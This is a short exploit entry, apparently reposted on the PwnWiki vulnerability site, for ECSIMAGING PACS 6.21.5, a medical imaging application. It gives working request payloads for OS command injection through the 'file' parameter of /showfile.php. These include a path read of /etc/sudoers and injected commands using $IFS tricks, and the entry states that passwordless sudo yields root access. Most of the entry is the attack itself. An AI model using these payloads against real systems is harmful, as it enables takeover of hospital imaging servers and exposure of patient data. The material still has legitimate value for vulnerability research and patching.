免费、自由、人人可编辑的漏洞库--PwnWiki.com
,
EXP
# Exploit Title: ECSIMAGING PACS 6.21.5 - Remote code execution # Date: 06/01/2021 # Exploit Author: shoxxdj # Vendor Homepage: https://www.medicalexpo.fr/ # Version: 6.21.5 and bellow ( tested on 6.21.5,6.21.3 ) # Tested on: Linux ECSIMAGING PACS Application in 6.21.5 and bellow suffers from a OS Injection vulnerability. The parameter "file" on the webpage /showfile.php can be exploited with simple OS injection to gain root access. www-data user has sudo NOPASSWD access : /showfile.php?file=/etc/sudoers ... www-data ALL=NOPASSWD: ALL ... Command injection can be realized with the $IFS tricks : <url>/showfile.php?file=;ls$IFS-la$IFS/ /showfile.php?file=;sudo$IFS-l ... User www-data may run the following commands on this host: (root) NOPASSWD: ALL ...
免费、自由、人人(PwnWiki.Com)可编辑的漏洞库
